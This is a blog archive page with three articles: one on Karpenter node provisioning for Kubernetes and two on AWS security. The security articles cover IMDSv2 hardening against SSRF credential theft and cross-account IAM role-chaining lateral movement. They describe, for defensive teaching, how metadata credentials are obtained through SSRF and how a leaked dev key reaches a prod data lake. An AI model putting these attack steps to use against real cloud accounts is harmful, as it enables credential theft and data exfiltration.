AWS Archives - Linuxcent

Karpenter: Just-in-Time Node Provisioning for Kubernetes

July 25, 2026 by Vamshi Krishna Santhapuri

Reading Time: 5 minutes

Kubernetes Ecosystem: From User to Contributor, Episode 8

11 min read

TL;DR

Karpenter needs no pre-defined node groups at all: it looks at pending pods’ actual resource requests and directly provisions an instance type and size that fits
NodePool and NodeClass are Karpenter’s two core CRDs: NodePool declares provisioning constraints and instance-type flexibility, NodeClass declares the cloud-specific details (AMI, subnets, security groups)
Consolidation is Karpenter’s continuous bin-packing behavior — it doesn’t just scale up when pods are pending, it actively replaces underutilized nodes with better-fitting ones to reduce cost
Karpenter handles spot interruption notices natively, draining gracefully before the two-minute warning expires, rather than relying on a separate spot-handling daemon
Originally AWS-only, Karpenter has been donated to Kubernetes SIGs specifically to become a cross-cloud project — provider parity for GKE, AKS, and others is real, current, in-progress work
Contribution opportunity: non-AWS provider feature parity is an explicitly open area with active upstream tracking — a genuinely current place to contribute

The Big Picture

CLUSTER AUTOSCALER MODEL                    KARPENTER MODEL
─────────────────────────                    ────────────────
Pre-defined node groups                      No node groups
(ASG A: m5.large, ASG B: m5.xlarge, ...)     Pending pod: needs 2 vCPU, 4Gi
        │                                            │
Pod pending, no capacity                     Karpenter evaluates: cheapest
        │                                    instance type that actually
Scale UP the node group                      fits, from a flexible list —
that (roughly) fits                          could be any instance family
        │                                    allowed by the NodePool
New node joins — may be                              │
oversized or undersized                      Provisions exactly that instance
for the actual pod                           — right-sized to the real
                                              pending workload

Karpenter node provisioning removes the middle abstraction layer entirely — instead of scaling a pre-sized group and hoping the group’s instance type roughly matches what’s pending, it computes the actual best-fit instance for the actual pending pods, every time.

NodePool and NodeClass: Karpenter’s Core CRDs

apiVersion: karpenter.sh/v1
kind: NodePool
metadata:
  name: general-purpose
spec:
  template:
    spec:
      requirements:
      - key: karpenter.k8s.aws/instance-category
        operator: In
        values: ["c", "m", "r"]      # flexible across instance families
      - key: karpenter.k8s.aws/instance-generation
        operator: Gt
        values: ["4"]
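      nodeClassRef:
        group: karpenter.k8s.aws
        kind: EC2NodeClass
        name: default
      expireAfter: 720h              # in v1, node expiry lives under template.spec
  disruption:
    consolidationPolicy: WhenEmptyOrUnderutilized   # v1 name; WhenUnderutilized was v1beta1
    consolidateAfter: 1m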
---
apiVersion: karpenter.k8s.aws/v1
kind: EC2NodeClass
metadata:
  name: default
spec:
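  amiSelectorTerms:
  - alias: al2023@latest               # v1 selects AMIs through amiSelectorTerms
  role: KarpenterNodeRole-my-cluster   # placeholder name; use your node IAM role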
  subnetSelectorTerms:
  - tags: {karpenter.sh/discovery: my-cluster}
  securityGroupSelectorTerms:
  - tags: {karpenter.sh/discovery: my-cluster}

NodePool says “here’s the range of instance types you’re allowed to choose from, and here’s the disruption policy” — it’s about scheduling flexibility. EC2NodeClass (or the equivalent for other providers) says “here’s the actual cloud-specific detail” — AMI, subnets, security groups. Splitting these two concerns is deliberate: a platform team can offer multiple NodePools with different cost/performance trade-offs, all referencing the same underlying NodeClass.
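To make the requirements block concrete, here is a minimal Python sketch of how In and Gt requirements could narrow a list of candidate instance types. It is not Karpenter's implementation: the `matches` and `allowed_types` helpers and the three-entry catalog are hypothetical, and only the label keys and operators come from the NodePool above.

```python
# Hypothetical illustration of NodePool requirement matching; not Karpenter's code.
CATEGORY = "karpenter.k8s.aws/instance-category"
GENERATION = "karpenter.k8s.aws/instance-generation"

REQUIREMENTS = [
    {"key": CATEGORY, "operator": "In", "values": ["c", "m", "r"]},
    {"key": GENERATION, "operator": "Gt", "values": ["4"]},
]

# Made-up catalog: instance type name -> labels it would carry.
CATALOG = {
    "m4.large": {CATEGORY: "m", GENERATION: "4"},
    "c6a.xlarge": {CATEGORY: "c", GENERATION: "6"},
    "t3.medium": {CATEGORY: "t", GENERATION: "3"},
}


def matches(labels, requirement):
    """Return True if one instance's labels satisfy one requirement."""
    value = labels.get(requirement["key"])
    if value is None:
        return False
    operator, values = requirement["operator"], requirement["values"]
    if operator == "In":
        return value in values
    if operator == "Gt":
        # Gt compares numerically against a single value.
        return int(value) > int(values[0])
    raise ValueError(f"operator not covered by this sketch: {operator}")


def allowed_types(catalog, requirements):
    """Names of instance types that satisfy every requirement."""
    return sorted(
        name
        for name, labels in catalog.items()
        if all(matches(labels, req) for req in requirements)
    )


print(allowed_types(CATALOG, REQUIREMENTS))  # ['c6a.xlarge']
```

Every requirement has to hold at once, which is why m4.large drops out on generation even though its category is allowed.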

How Karpenter Actually Picks an Instance Type

$ kubectl get nodeclaims
NAME            TYPE          ZONE         NODE               READY   AGE
general-x7k2l   c6a.xlarge    us-east-1a   ip-10-0-1-42...    True    45s

$ kubectl describe nodeclaim general-x7k2l
...
Events:
  Reason              Message
  ------              -------
  Launched            Launched instance: i-0abc123... c6a.xlarge
  #                    ^^^^^^^^^^ — chosen because it was the cheapest
  #                    instance type in the allowed range that fit
  #                    the pending pods' actual CPU/memory requests

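A NodeClaim is the record of one provisioning decision: it shows exactly which instance type Karpenter launched for a set of pending pods. The detailed reasoning (which candidates were considered) tends to live in the controller logs rather than in the NodeClaim itself. A node-group scale-up event, by contrast, only tells you the group’s already-fixed instance type was used again regardless of fit.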
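The selection idea can be sketched in a few lines of Python. This is a simplified model under stated assumptions, not Karpenter's scheduler: the prices are invented, the `cheapest_fit` helper is hypothetical, and real provisioning also accounts for daemonsets, kubelet and system reservations, zones, and spot capacity.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class InstanceType:
    name: str
    vcpu: float
    memory_gib: float
    hourly_usd: float  # invented price, for illustration only


def cheapest_fit(candidates, cpu_request, memory_request_gib):
    """Pick the lowest-priced candidate that covers the summed pod requests."""
    fitting = [
        c for c in candidates
        if c.vcpu >= cpu_request and c.memory_gib >= memory_request_gib
    ]
    return min(fitting, key=lambda c: c.hourly_usd, default=None)


CANDIDATES = [
    InstanceType("m5.2xlarge", 8, 32, 0.40),
    InstanceType("c6a.xlarge", 4, 8, 0.15),
    InstanceType("c6a.large", 2, 4, 0.08),
]

# Pending pods that together request 3 vCPU and 6 GiB.
choice = cheapest_fit(CANDIDATES, cpu_request=3, memory_request_gib=6)
print(choice.name)  # c6a.xlarge
```

The m5.2xlarge would also fit, but it costs more in this made-up catalog, and the c6a.large is cheaper but too small.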

Consolidation: Karpenter’s Continuous Bin-Packing

# Karpenter continuously evaluates whether existing nodes could be
# consolidated into fewer, better-utilized nodes.
# Illustrative view only: kubectl has no utilization columns for NodeClaims,
# and Karpenter decides based on pod resource requests, not live usage.
NAME            TYPE         CPU-UTIL   MEM-UTIL
node-a          m5.2xlarge   15%        20%
node-b          m5.2xlarge   18%        22%
#                                             both underutilized: Karpenter
#                                             may consolidate these two onto
#                                             a single, smaller instance

This is the behavior that most differentiates Karpenter from a traditional autoscaler: it doesn’t just react to pending pods by scaling up. It continuously looks for opportunities to replace a set of underutilized nodes with fewer, better-fitting ones — actively working to reduce cost, not just meet demand.
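A rough way to picture the consolidation decision is a check with two conditions: the pods on the candidate nodes must fit on the replacement, and the replacement must cost less than what it replaces. The Python sketch below assumes exactly that and nothing more; `can_consolidate` is a hypothetical helper, the prices are invented, and the real controller also honors PDBs, disruption budgets, and scheduling constraints.

```python
def can_consolidate(pod_requests, current_nodes, replacement):
    """Return True if all pods fit on the replacement and it is cheaper.

    pod_requests: list of (cpu, memory_gib) tuples for pods on the candidate nodes
    current_nodes: list of dicts with an 'hourly_usd' key
    replacement: dict with 'vcpu', 'memory_gib' and 'hourly_usd' keys
    """
    total_cpu = sum(cpu for cpu, _ in pod_requests)
    total_memory = sum(memory for _, memory in pod_requests)
    fits = (
        total_cpu <= replacement["vcpu"]
        and total_memory <= replacement["memory_gib"]
    )
    current_cost = sum(node["hourly_usd"] for node in current_nodes)
    return fits and replacement["hourly_usd"] < current_cost


# Two m5.2xlarge nodes (8 vCPU, 32 GiB each) carrying light workloads.
nodes = [{"hourly_usd": 0.40}, {"hourly_usd": 0.40}]  # invented prices
pods = [(1.2, 6.4), (1.44, 7.04)]  # requests: roughly 15-22% of each node

m5_xlarge = {"vcpu": 4, "memory_gib": 16, "hourly_usd": 0.20}
m5_large = {"vcpu": 2, "memory_gib": 8, "hourly_usd": 0.10}

print(can_consolidate(pods, nodes, m5_xlarge))  # True
print(can_consolidate(pods, nodes, m5_large))   # False
```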

Interruption Handling: Spot Instances Done Right

# Karpenter watches for AWS's spot interruption notice natively
$ kubectl get events --field-selector reason=DisruptionTerminating
LAST SEEN   REASON                  MESSAGE
5s          DisruptionTerminating   Node terminating due to spot interruption,
                                     draining pods gracefully before 2-minute deadline

Before Karpenter, handling spot interruptions gracefully typically meant running a separate tool (like AWS Node Termination Handler) alongside your autoscaler. Karpenter builds this in directly: the same controller that made the original provisioning decision also handles the interruption, rather than a bolted-on system watching for the same signal independently. On AWS this relies on an SQS interruption queue fed by EventBridge events, so the queue has to be configured for the feature to work.

⚠ Production Gotchas

Aggressive consolidation without properly configured PodDisruptionBudgets can cause more pod churn than teams expect. Karpenter respects PDBs, but if you haven’t set them, consolidation can evict pods more freely than teams accustomed to Cluster Autoscaler’s more conservative defaults anticipate.

A misconfigured NodeClass (wrong subnet tags, wrong security group selector) fails silently from the scheduler’s point of view — pods just stay pending, and the actual error is in Karpenter’s controller logs or NodeClaim events, not anywhere the standard kubectl get pods workflow surfaces by default.

Karpenter’s own controller needs real resource requests and, ideally, its own dedicated nodes or a stable node pool — running the thing that provisions your nodes on a node that might itself get consolidated away is a bootstrapping problem worth designing around explicitly.

Quick Reference

kubectl get nodepools                       # provisioning policies defined
kubectl get ec2nodeclasses                  # cloud-specific node configuration (AWS provider)
kubectl get nodeclaims                      # individual provisioning decisions
kubectl describe nodeclaim <name>            # why this specific instance was chosen
kubectl get events --field-selector reason=DisruptionTerminating   # interruption/consolidation activity

Contribution Opportunity: Closing Non-AWS Provider Feature Parity

The limitation: Karpenter started as an AWS-specific project and has since been donated to Kubernetes SIGs specifically to become a genuinely cross-cloud tool. The GKE provider and others are real and actively developed, but feature parity with the mature AWS provider — specific instance-selection heuristics, certain disruption/consolidation behaviors, provider-specific NodeClass capabilities — isn’t complete yet, and this is openly tracked, not hidden.

Why it’s hard to fix: Each cloud’s instance-provisioning API, spot-interruption signaling mechanism, and networking model differs meaningfully — replicating AWS provider behavior on GCP or Azure isn’t a port, it’s a re-implementation against a different API with different constraints and different edge cases, done by a provider team with less historical runtime than the original AWS implementation had.

What a contribution-shaped fix looks like: The core project lives at kubernetes-sigs/karpenter, and each cloud provider is developed in its own repository (Azure/karpenter-provider-azure, for example) with its own issue tracker listing specific, scoped feature-parity gaps against the AWS implementation. This isn’t a vague “make it better”; it’s a list of concrete, individually tractable items. Picking one specific parity gap, understanding how the AWS provider solved the equivalent problem, and implementing the analogous behavior for the target cloud is real, wanted, trackable upstream work: precisely the shape of contribution this series has been pointing at throughout.

Key Takeaways

Karpenter provisions the actual best-fit instance for pending pods directly, with no pre-defined node-group middle layer
NodePool (scheduling flexibility) and NodeClass (cloud-specific detail) are deliberately separated concerns
Consolidation is active, continuous bin-packing — Karpenter looks for cost savings, not just capacity needs
Native spot interruption handling removes the need for a separate termination-handling tool
Non-AWS provider feature parity is explicitly open, tracked work — a real, current, well-scoped contribution opportunity in a project under active cross-cloud expansion

What’s Next

EP09 puts Karpenter head-to-head against the tool it’s increasingly replacing — Cluster Autoscaler — and gives a clear recommendation for when the older, node-group model is still the right choice.

Next: EP09 — Karpenter vs Cluster Autoscaler: Why AWS Built Its Own Scaler


Cloud-Native Hardening: Securing the AWS Identity Perimeter

July 7, 2026 by Vamshi Krishna Santhapuri

Reading Time: 6 minutes

Zero to Hero: Cybersecurity Architecture Masterclass, Module 3

12 min read

TL;DR

Cloud native infrastructure hardening starts from a different assumption than on-prem hardening: there is no network perimeter, only an identity perimeter — every AWS API call is the boundary
Leaving IMDSv1 enabled (the EC2 metadata service without a token) is what turned an SSRF bug into the Capital One breach; enforcing IMDSv2 is the single highest-leverage cloud-native hardening fix available
IAM policy design is architecture, not IT administration: least privilege, permission boundaries, and SCPs compose into the actual perimeter
Infrastructure-as-code scanning (checkov, tfsec) catches identity-perimeter mistakes in a pull request instead of in an incident
aws iam simulate-principal-policy answers “can this role actually do that?” definitively, without waiting to find out in production
Recommendation: treat IMDSv2 enforcement and IAM least-privilege review as pipeline gates, not periodic audits — the same “build constraint, not process step” principle from the OS Hardening series

The Big Picture: The Perimeter Moved to the API Call

ON-PREM MODEL                          CLOUD-NATIVE MODEL
──────────────                          ──────────────────
Firewall at network edge                No fixed network edge
        │                                        │
Trusted internal subnet                 Every API call carries its
        │                                 own identity + policy
Server assumed safe if                          │
inside the firewall                     IAM evaluates: who is this,
                                          what can they do, right now
                                                 │
                                          Perimeter = the IAM policy
                                          attached to the caller

Cloud-native infrastructure hardening means accepting that the network no longer defines what’s trusted — the AWS identity perimeter, enforced entirely through IAM policy evaluation on every single API call, is the only perimeter that actually exists. Module 1 called this the shift from network-centric to identity-centric trust; this module makes it concrete with the two failures that actually break it in production: a leaky metadata service and an over-permissioned role.

The Breach That Made IMDSv2 Mandatory

In 2019, a misconfigured WAF in front of a bank’s application allowed a Server-Side Request Forgery (SSRF) — an attacker convinced the application server to make an HTTP request to http://169.254.169.254, the EC2 instance metadata endpoint. IMDSv1 answered with no authentication required at all: temporary IAM credentials for the role attached to that instance, handed to anyone who could make the server issue that one request.

Those credentials had read access to S3. The attacker used them to exfiltrate over 100 million customer records. This is the Capital One breach — covered in full in the Purple Team series — and it is the single clearest illustration in cloud history of why “the perimeter is the identity, not the network” isn’t a slogan — it’s a description of exactly where that breach actually happened. The WAF misconfiguration was the entry point. The metadata service handing out credentials with zero verification was the architectural failure that turned an SSRF bug into a 100-million-record breach.

IMDSv2 closes this specific gap by requiring a session token, fetched via a PUT request, before any metadata GET request is honored — and that PUT request cannot be replayed through a typical SSRF, because SSRF vulnerabilities almost always only allow GET-style requests to be forged. This single setting is the highest-leverage cloud-native hardening control available, and it should be enforced at the account level, not left as an opt-in per instance:

# Check whether IMDSv2 is enforced (HttpTokens: required) on an instance
$ aws ec2 describe-instances --instance-ids i-0abc123 \
    --query 'Reservations[].Instances[].MetadataOptions'
{
    "HttpTokens": "required",
    "HttpPutResponseHopLimit": 1,
    "HttpEndpoint": "enabled"
}
# "required" = IMDSv2 only. "optional" = IMDSv1 still works — the gap.

# Enforce it as the account-level default for all new instances (set per Region)
$ aws ec2 modify-instance-metadata-defaults \
    --http-tokens required --http-put-response-hop-limit 1
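The two-step token flow is easy to see in code. The sketch below uses only Python's standard library; the endpoint paths and the two header names are the documented IMDSv2 ones, while the helper function names are my own. The `fetch_instance_id` function only succeeds when run on an EC2 instance, so the request builders are kept separate and can be inspected anywhere.

```python
import urllib.request

IMDS_BASE = "http://169.254.169.254"


def build_token_request(ttl_seconds=21600):
    """Step 1: a PUT with a TTL header. A GET-only SSRF cannot forge this."""
    return urllib.request.Request(
        f"{IMDS_BASE}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def build_metadata_request(token, path="/latest/meta-data/instance-id"):
    """Step 2: a GET that must carry the session token from step 1."""
    return urllib.request.Request(
        f"{IMDS_BASE}{path}",
        method="GET",
        headers={"X-aws-ec2-metadata-token": token},
    )


def fetch_instance_id(timeout=2.0):
    """Run both steps. Only works from inside an EC2 instance."""
    with urllib.request.urlopen(build_token_request(), timeout=timeout) as resp:
        token = resp.read().decode()
    with urllib.request.urlopen(build_metadata_request(token), timeout=timeout) as resp:
        return resp.read().decode()
```

With HttpTokens set to required, a metadata GET without the token header is rejected, which is the property that breaks the simple SSRF path described above.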

IAM Policy Design Is Architecture

If the metadata service is one way the identity perimeter leaks, an over-permissioned IAM policy is the other — and it’s far more common, because it doesn’t require a bug at all. It only requires a policy written with "Resource": "*" because scoping it felt like it would slow down a deploy.

Least privilege means a role can do exactly what its function requires and nothing else — not “read-only across the account,” but “read this specific S3 prefix, write to this specific queue.”

Permission boundaries cap what a role can ever be granted, even by someone with iam:CreatePolicy access — a safety rail against exactly the kind of iam:PassRole privilege escalation covered in the Cloud IAM series, not just against the policy as originally written.

Service Control Policies (SCPs) apply at the AWS Organization level, capping what any role in an account can do regardless of how permissive that account’s own IAM policies are — the outermost layer of the identity perimeter, and the one that survives a single account being compromised.

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": ["s3:GetObject"],
    "Resource": "arn:aws:s3:::billing-invoices/tenant-4471/*"
  }]
}

That policy can only ever read one tenant’s invoice prefix. Compare it to "Resource": "arn:aws:s3:::billing-invoices/*" — functionally identical for the one use case the developer was testing, and catastrophically different the day this role’s credentials leak.
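The difference between the two Resource values can be checked mechanically. The following Python sketch approximates IAM's wildcard matching (`*` for any run of characters, `?` for a single character); `resource_matches` is a hypothetical helper, the object key is made up, and real IAM evaluation involves more than this one comparison.

```python
import re


def resource_matches(pattern, arn):
    """Approximate IAM Resource matching: '*' = any run, '?' = one character."""
    regex = "".join(
        ".*" if ch == "*" else "." if ch == "?" else re.escape(ch)
        for ch in pattern
    )
    return re.fullmatch(regex, arn) is not None


SCOPED = "arn:aws:s3:::billing-invoices/tenant-4471/*"
BROAD = "arn:aws:s3:::billing-invoices/*"

own_object = "arn:aws:s3:::billing-invoices/tenant-4471/2026-07.pdf"    # made-up key
other_object = "arn:aws:s3:::billing-invoices/tenant-9982/2026-07.pdf"  # made-up key

print(resource_matches(SCOPED, own_object))    # True
print(resource_matches(SCOPED, other_object))  # False
print(resource_matches(BROAD, other_object))   # True
```

Both patterns pass the developer's own test case; only the scoped one refuses the other tenant's object.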

Quick Check: Can This Role Actually Do That?

Don’t wait to find out in production. aws iam simulate-principal-policy evaluates a specific action against a role’s actual attached and inline policies, including any permissions boundary and, for accounts in an AWS Organization, applicable SCPs, and returns an allow/deny decision for those policies before anything runs:

$ aws iam simulate-principal-policy \
    --policy-source-arn arn:aws:iam::123456789012:role/billing-api-role \
    --action-names s3:GetObject \
    --resource-arns arn:aws:s3:::billing-invoices/tenant-9982/*

{
  "EvaluationResults": [{
    "EvalActionName": "s3:GetObject",
    "EvalResourceName": "arn:aws:s3:::billing-invoices/tenant-9982/*",
    "EvalDecision": "explicitDeny",     # ← the answer you needed before deploying
    "MatchedStatements": [...]
  }]
}

explicitDeny here means some policy statement (in the role’s own policy, a permission boundary, or an SCP) explicitly blocks the action, and that takes precedence over any Allow anywhere else in the policy chain (Module 1’s deny-by-default evaluation model, in practice). An implicitDeny would instead mean that no statement allows the action at all, which is what a correctly scoped least-privilege policy returns for a resource outside its scope. Run this simulation as part of code review for any new IAM policy, not after the role is already attached to a running service.
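To use the simulation as a review gate, its JSON output has to be turned into a pass/fail signal. A minimal Python sketch, assuming the CLI output has been captured as a string: `non_allowed` is a hypothetical helper, and the field names and the three decision values (allowed, explicitDeny, implicitDeny) are the ones the simulator returns.

```python
import json


def non_allowed(simulation_json):
    """Return (action, resource, decision) for every result that is not 'allowed'."""
    results = json.loads(simulation_json)["EvaluationResults"]
    return [
        (r["EvalActionName"], r["EvalResourceName"], r["EvalDecision"])
        for r in results
        if r["EvalDecision"] != "allowed"
    ]


SAMPLE_OUTPUT = json.dumps({
    "EvaluationResults": [
        {
            "EvalActionName": "s3:GetObject",
            "EvalResourceName": "arn:aws:s3:::billing-invoices/tenant-9982/*",
            "EvalDecision": "explicitDeny",
        },
        {
            "EvalActionName": "s3:GetObject",
            "EvalResourceName": "arn:aws:s3:::billing-invoices/tenant-4471/*",
            "EvalDecision": "allowed",
        },
    ]
})

for action, resource, decision in non_allowed(SAMPLE_OUTPUT):
    print(f"{decision}: {action} on {resource}")
```

Whether a deny should fail the build depends on intent: for a cross-tenant resource like the one above, a deny is the expected, passing outcome.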

Catching This Before It Ships: Cloud-Native Hardening via IaC Scanning

Manually reviewing every Terraform IAM policy in every pull request doesn’t scale past a handful of engineers. checkov and tfsec scan infrastructure-as-code for exactly the patterns above — wildcard resources, IMDSv1 left enabled, public S3 buckets — as a CI step, before terraform apply ever runs:

$ checkov -d ./terraform --check CKV_AWS_79,CKV_AWS_62

Check: CKV_AWS_79: "Ensure Instance Metadata Service Version 1 is not enabled"
    FAILED for resource: aws_instance.billing_api
    File: main.tf:14-22

Check: CKV_AWS_62: "Ensure IAM policies that allow full "*-*" administrative privileges are not created"
    FAILED for resource: aws_iam_role_policy.billing_api_policy
    File: iam.tf:8-15
        Resource: "*"

A failed checkov check blocking a pull request is the identity-perimeter equivalent of Stratum’s pipeline gate refusing to snapshot an unhardened image — the unsafe configuration never reaches an account where it can be exploited, because the check runs before merge, not after an audit finds it months later.
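The kind of rule these scanners apply can be illustrated with a toy check. This Python sketch is not how checkov or tfsec are implemented; `wildcard_findings` is a hypothetical function that flags Allow statements whose Resource is a bare `*` in an IAM policy document.

```python
import json


def wildcard_findings(policy_json):
    """Flag Allow statements that grant access to Resource "*"."""
    policy = json.loads(policy_json)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be a bare object
        statements = [statements]
    findings = []
    for index, statement in enumerate(statements):
        if statement.get("Effect") != "Allow":
            continue
        resources = statement.get("Resource", [])
        if isinstance(resources, str):
            resources = [resources]
        if "*" in resources:
            findings.append(f"statement {index}: Allow on Resource \"*\"")
    return findings


RISKY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": ["s3:GetObject"], "Resource": "*"}],
})
SCOPED = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["s3:GetObject"],
        "Resource": "arn:aws:s3:::billing-invoices/tenant-4471/*",
    }],
})

print(wildcard_findings(RISKY))   # ['statement 0: Allow on Resource "*"']
print(wildcard_findings(SCOPED))  # []
```

A CI step would exit non-zero when the findings list is non-empty, which is the "blocked pull request" behavior described above.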

Production Gotchas

IMDSv2 enforcement can break old SDKs and tools silently. Some older AWS SDK versions and third-party agents assume IMDSv1 and simply fail to fetch credentials once HttpTokens: required is set — test in staging before enforcing account-wide.

iam simulate-principal-policy doesn’t account for resource-based policies on the target unless you supply them. It evaluates the principal’s policies correctly, but if the target (an S3 bucket, a KMS key) has its own resource policy denying access, pass that policy explicitly with --resource-policy (simulate-custom-policy accepts the same option) to get the full picture.

SCPs fail closed in a way that’s easy to misdiagnose. An SCP deny produces the same AccessDenied error as a missing IAM permission — check the SCP layer explicitly before assuming the role’s own policy is the problem, or you’ll spend an hour widening a policy that was never the actual blocker.

checkov/tfsec false positives erode trust in the gate fast. Suppress specific, documented exceptions inline (#checkov:skip=CKV_AWS_79:reason) rather than disabling the check for the whole pipeline the first time it blocks something legitimate.

Framework Alignment

Framework	Control / ID	Architectural Mapping
NIST CSF 2.0	PR.AA-05	Access permissions are managed, incorporating least privilege and separation of duties.
NIST SP 800-207	Zero Trust	The identity perimeter, enforced per-API-call, is the direct implementation of continuous verification.
ISO 27001:2022	8.2	Privileged access rights are restricted and managed.
SOC 2	CC6.3	The entity authorizes, modifies, or removes access based on roles and responsibilities.

Key Takeaways

The identity perimeter, not the network, is what cloud-native hardening actually secures — every IAM policy evaluation is a perimeter check
IMDSv2 enforcement is the single highest-leverage fix available and should be an account-wide default, not an opt-in
Least privilege, permission boundaries, and SCPs are three layers of the same perimeter — design all three deliberately, don’t rely on one
aws iam simulate-principal-policy gives a definitive answer before deployment instead of an incident after
IaC scanning turns identity-perimeter mistakes into blocked pull requests instead of production findings

What’s Next

Module 3 hardened the identity perimeter against external and lateral threats. Module 4 asks what happens after a perimeter fails anyway — specifically, how immutable, WORM-locked data architecture makes ransomware and mass-deletion attacks survivable even when an attacker has already gotten past every control this module covers.

Next: Module 4: Resilience & Survival — Immutable Data Architecture and Surviving Ransomware via WORM


Cloud Lateral Movement: Cross-Account IAM Role Chaining Explained

July 4, 2026 by Vamshi Krishna Santhapuri

Reading Time: 12 minutes


TL;DR

Cloud lateral movement through IAM maps to OWASP A01: attackers move between cloud accounts by exploiting cross-account IAM trust relationships, with no network pivoting and no exploit, just a valid sts:AssumeRole call
The structural vulnerability is a trust policy scoped too broadly — arn:aws:iam::DEV_ACCOUNT:root instead of the specific Lambda execution role ARN — which lets any identity in the dev account assume the prod role
The full attack chain: compromised Lambda in dev account → enumerate cross-account trust policies → aws sts assume-role into prod → access data lake S3 bucket → exfiltrate before detection fires
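CloudTrail is the primary detection surface: AssumeRole events where the principal account ID differs from the resource account ID are the signal; GuardDuty may surface the surrounding enumeration as an anomalous-behavior finding such as Discovery:IAMUser/AnomalousBehavior (the older Recon:IAMUser/UserPermissions type has been retired)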
AWS Access Analyzer automatically flags overly-broad cross-account trust policies — it should be running in every account in your organization, not just the management account
The structural fix is three layers: scope trust policy to the specific source ARN, add ExternalId for confused deputy protection, and use AWS Organizations SCPs to restrict cross-account role assumptions to approved account pairs only

OWASP Mapping: A01 Broken Access Control — cross-account IAM trust policies that specify an entire account root as the principal, instead of a specific role ARN, give any identity in the source account the ability to pivot into the target account.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│               CROSS-ACCOUNT IAM LATERAL MOVEMENT                    │
│                                                                      │
│   DEV ACCOUNT (111111111111)                                         │
│   ┌────────────────────────────────────────────┐                    │
│   │  Lambda: api-processor                     │                    │
│   │  Execution Role: lambda-execution-role     │◄── COMPROMISED     │
│   │                                            │                    │
│   │  Attacker has: access key for this role    │                    │
│   └───────────────────┬────────────────────────┘                    │
│                        │                                             │
│                        │  sts:AssumeRole                             │
│                        │  (cross-account API call)                  │
│                        ▼                                             │
│   ┌─────────────────────────────────────────────┐                   │
│   │  TRUST POLICY CHECK (prod account role)     │                   │
│   │                                             │                   │
│   │  Principal: arn:aws:iam::111111111111:root  │                   │
│   │              ↑ TOO BROAD — any dev identity │                   │
│   └───────────────────┬─────────────────────────┘                   │
│                        │ ALLOW                                       │
│                        ▼                                             │
│   PROD ACCOUNT (222222222222)                                        │
│   ┌────────────────────────────────────────────┐                    │
│   │  Role: datalake-reader                     │                    │
│   │  Access: s3:GetObject on prod-datalake-*   │                    │
│   │          rds:Connect on prod-analytics-db  │                    │
│   │          secretsmanager:GetSecretValue      │                    │
│   └────────────────────┬───────────────────────┘                    │
│                         │                                            │
│                         ▼                                            │
│   customer-data.parquet, analytics schemas, DB credentials          │
│   ← exfiltrated in 23 minutes                                        │
└─────────────────────────────────────────────────────────────────────┘

Cloud lateral movement IAM attacks succeed because the authentication step — the sts:AssumeRole call — works exactly as designed. The Lambda’s identity is valid. The cross-account trust policy explicitly allows it. AWS faithfully issues the temporary credentials. The entire attack is indistinguishable from legitimate application behavior at the API level, which is why the trust policy is the only reliable prevention point.
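Since the trust policy is the prevention point, it helps to see what a tightly scoped one looks like. The Python sketch below builds a trust policy that names one specific role ARN and requires an ExternalId. The `scoped_trust_policy` helper and the ExternalId value are hypothetical; the role ARN is the dev Lambda execution role from the diagram.

```python
import json


def scoped_trust_policy(source_role_arn, external_id):
    """Trust policy that lets exactly one role assume the target, with an ExternalId."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Principal": {"AWS": source_role_arn},
            "Action": "sts:AssumeRole",
            "Condition": {"StringEquals": {"sts:ExternalId": external_id}},
        }],
    }


policy = scoped_trust_policy(
    "arn:aws:iam::111111111111:role/lambda-execution-role",
    "example-external-id",  # hypothetical value, agreed between both sides
)
print(json.dumps(policy, indent=2))
```

With this policy, other identities in the dev account can no longer assume the prod role, and the legitimate caller has to pass the matching external ID on its assume-role call.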

The Incident: Dev Lambda to Prod Data Lake

Post-breach analysis. The attacker didn’t find a zero-day. They found a GitHub repository.

A developer had committed an .env file to a public repo containing AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY for a Lambda execution role in the dev account. GitHub’s secret scanning flagged it and notified the security team — but the notification arrived 58 minutes after the commit. By then, an automated credential scanner had already found it, validated the keys, and passed them to an attacker.

That 58-minute window is the entire story.

The Lambda’s execution role was scoped to the dev account, so initial triage assumed the blast radius was limited to dev. It wasn’t. A previous sprint had set up a cross-account trust relationship so the Lambda could read from the prod data lake during a data quality audit. The trust policy on the datalake-reader role in prod read:

"Principal": {"AWS": "arn:aws:iam::111111111111:root"}

Not the Lambda’s specific execution role ARN. The entire dev account root. Any identity in the dev account — including the one the attacker now held — could assume datalake-reader in prod.

The attacker enumerated cross-account roles from inside the compromised Lambda context, found the trust relationship, assumed the prod role, listed the data lake S3 bucket, and exfiltrated 14 GB of customer data parquet files before the first GuardDuty finding surfaced.

The revelation: cloud lateral movement doesn’t require network pivoting. It requires finding one IAM trust relationship that’s too broad.

The compromise of the dev Lambda was recoverable — rotate credentials, remediate the repo, done. The cross-account trust policy turned it into a prod data breach.
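Finding this class of mistake is mechanical once you have the trust policy document in hand. As a minimal sketch (the `broad_principals` function is hypothetical, and AWS Access Analyzer does this far more thoroughly), the following Python flags principals that grant trust to a whole account or to everyone:

```python
import re

ACCOUNT_ROOT = re.compile(r"arn:aws:iam::\d{12}:root")
BARE_ACCOUNT_ID = re.compile(r"\d{12}")  # shorthand equivalent to the account root


def broad_principals(trust_policy):
    """Return principals in Allow statements that trust a whole account or '*'."""
    statements = trust_policy.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    findings = []
    for statement in statements:
        if statement.get("Effect") != "Allow":
            continue
        principal = statement.get("Principal", {})
        if principal == "*":
            findings.append("*")
            continue
        aws = principal.get("AWS", [])
        if isinstance(aws, str):
            aws = [aws]
        for entry in aws:
            if (
                entry == "*"
                or ACCOUNT_ROOT.fullmatch(entry)
                or BARE_ACCOUNT_ID.fullmatch(entry)
            ):
                findings.append(entry)
    return findings


incident_policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::111111111111:root"},
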